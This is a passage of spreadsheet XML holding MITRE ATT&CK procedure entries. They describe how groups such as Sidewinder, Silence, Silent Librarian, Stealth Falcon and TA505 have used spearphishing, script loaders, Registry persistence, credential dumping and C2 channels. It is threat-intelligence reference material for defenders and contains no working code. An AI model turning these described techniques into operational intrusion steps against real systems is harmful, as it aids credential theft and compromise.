    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used malware to collect information on files and directories.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used LNK files to download remote files to the victim's network.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used JavaScript to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has collected stolen files in a temporary folder in preparation for exfiltration.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has lured targets to click on malicious files to gain execution in the target environment.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has lured targets to click on malicious links to gain execution in the target environment.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has named malicious files &lt;code&gt;rekeywiz.exe&lt;/code&gt; to match the name of a legitimate Windows executable.(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used &lt;code&gt;mshta.exe&lt;/code&gt; to execute malicious payloads.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used base64 encoding and ECDH-P256 encryption for scripts and files.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used PowerShell to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to identify running processes on the victim's machine.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has added paths to executables in the Registry to establish persistence.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used the Windows service &lt;code&gt;winmgmts:\\.\root\SecurityCenter2&lt;/code&gt; to check installed antivirus products.(Citation: Rewterz Sidewinder APT April 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to enumerate software installed on an infected host.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious attachments that lead victims to credential harvesting websites.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious attachments often crafted for specific targets.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious links often crafted for specific targets.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious links to credential harvesting websites.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used malware to collect information on network interfaces, including the MAC address.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to identify the user of a compromised host.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to obtain the current system time.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used VBScript to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used HTTP in C2 communications.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).(Citation: Group IB Silence Aug 2019)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Aug 2019)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has downloaded additional modules and malware to victim’s machines.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used JS scripts.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used the Farse6.1 utility (based on [Mimikatz](https://attack.mitre.org/software/S0002)) to extract credentials from lsass.exe.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has named its backdoor "WINWORD.exe".(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) can create, delete, or modify a specified Registry key or value.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used port 444 when sending data about the system from the client to the server.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used environment variable string substitution for obfuscation.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell to download and execute payloads.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has injected a DLL library containing a Trojan into the fwmain32.exe process.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;, &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;, and the Startup folder to establish persistence.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used RDP for lateral movement.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used scheduled tasks to stage its operation.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used [Winexe](https://attack.mitre.org/software/S0191) to install a service on the remote system.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used RAdmin, a remote software tool used to remotely control workstations and ATMs.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM, LNK and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has obtained and modified versions of publicly-available tools like [Empire](https://attack.mitre.org/software/S0363) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Group IB Silence Aug 2019) (Citation: SecureList Silence Nov 2017)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used compromised credentials to log on to other systems and escalate privileges.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used VBS scripts.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has obtained free Let's Encrypt SSL certificates for use on their phishing pages.(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS September 2019)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Proofpoint TA407 September 2019)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Malwarebytes Silent Librarian October 2020)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has established e-mail accounts to receive e-mails forwarded from compromised accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has collected e-mail addresses from targeted organizations from open Internet searches.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has exfiltrated entire mailboxes from compromised accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has set up auto forwarding rules on compromised e-mail accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has collected lists of names for individuals from targeted organizations.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. [Silent Librarian](https://attack.mitre.org/groups/G0122) has also made use of a variety of URL shorteners for these staged websites.(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has searched victim's websites to identify the interests and academic areas of targeted individuals and to scrape source code, branding, and organizational contact information for phishing pages.(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Proofpoint TA407 September 2019)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Proofpoint TA407 September 2019)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Malwarebytes Silent Librarian October 2020)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.(Citation: Proofpoint TA407 September 2019)(Citation: Secureworks COBALT DICKENS September 2019)</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has used compromised credentials to obtain unauthorized access to online accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[SilverTerrier](https://attack.mitre.org/groups/G0083) uses FTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)	</t>
  </si>
  <si>
    <t>[SilverTerrier](https://attack.mitre.org/groups/G0083) uses SMTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[SilverTerrier](https://attack.mitre.org/groups/G0083) uses HTTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)	</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) extracted documents and bundled them into a RAR archive.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) extracted Word documents from a file server on a victim network.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) has used keylogging tools.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory &lt;code&gt;CSIDL_APPDATA\microsoft\security&lt;/code&gt;.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) listed remote shared drives that were accessible from a victim.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) has used credential dumping tools.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) obtained OS version and hardware configuration from a victim.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) has used command line during its intrusions.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware uses WMI to script data collection and command execution on the victim.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers data from the local victim system.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>After data is collected by [Stealth Falcon](https://attack.mitre.org/groups/G0038) malware, it is exfiltrated over the existing C2 channel.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers a list of running processes.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware attempts to determine the installed version of .NET by querying the Registry.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware encrypts C2 traffic using RC4 with a hard-coded key.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers the Address Resolution Protocol (ARP) table from the victim.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers the registered user and primary owner name via WMI.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware communicates with its C2 server via HTTPS.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from the Windows Credential Vault.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers system information via Windows Management Instrumentation (WMI).(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) has used a hidden file system that is stored as a file on disk.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.(Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) has used stolen certificates to sign its malware.(Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) the victim's internal network for hosts with ports 8080, 5900, and 40 open.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) used a signed credential-dumping tool to obtain victim account credentials.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>Several tools used by [Suckfly](https://attack.mitre.org/groups/G0039) have been command-line driven.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has used PowerShell for execution of a payload.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has targeted victims using spearphishing emails with malicious Microsoft Word attachments.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has a VBScript for execution.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to gather credentials from FTP clients and Outlook.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to gather credentials from Internet Explorer.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used a wide variety of ransomware, such as [Clop](https://attack.mitre.org/software/S0611), Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has decrypted packed DLLs with an XOR key.(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to disable Windows Defender.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has registered domains to impersonate services such as Dropbox to distribute malware.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has leveraged malicious Word documents that abused DDE.(Citation: Proofpoint TA505 June 2018)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has downloaded additional malware to execute on victim systems.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: ProofPoint SettingContent-ms July 2018)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used JavaScript for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to click links in emails and attachments. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware such as [Azorult](https://attack.mitre.org/software/S0344) and [Cobalt Strike](https://attack.mitre.org/software/S0154) in their operations.(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used .iso files to deploy malicious .lnk files.(Citation: TrendMicro TA505 Aug 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to disable Windows Defender through modification of the Registry.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used &lt;code&gt;msiexec&lt;/code&gt; to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has deployed payloads that use Windows API calls on a compromised host.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has password-protected malicious Word documents and used base64 encoded PowerShell commands.(Citation: Proofpoint TA505 Sep 2017)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used TinyMet to enumerate members of privileged groups.(Citation: IBM TA505 April 2020) [TA505](https://attack.mitre.org/groups/G0092) has also run &lt;code&gt;net group /domain&lt;/code&gt;.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used PowerShell to download and execute malware and reconnaissance scripts.(Citation: Proofpoint TA505 Sep 2017)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has leveraged &lt;code&gt;rundll32.exe&lt;/code&gt; to execute malicious DLLs.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used a variety of tools in their operations, including [AdFind](https://attack.mitre.org/software/S0552), [BloodHound](https://attack.mitre.org/software/S0521), [Mimikatz](https://attack.mitre.org/software/S0002), and [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has staged malware on actor-controlled domains.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has executed commands using &lt;code&gt;cmd.exe&lt;/code&gt;.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
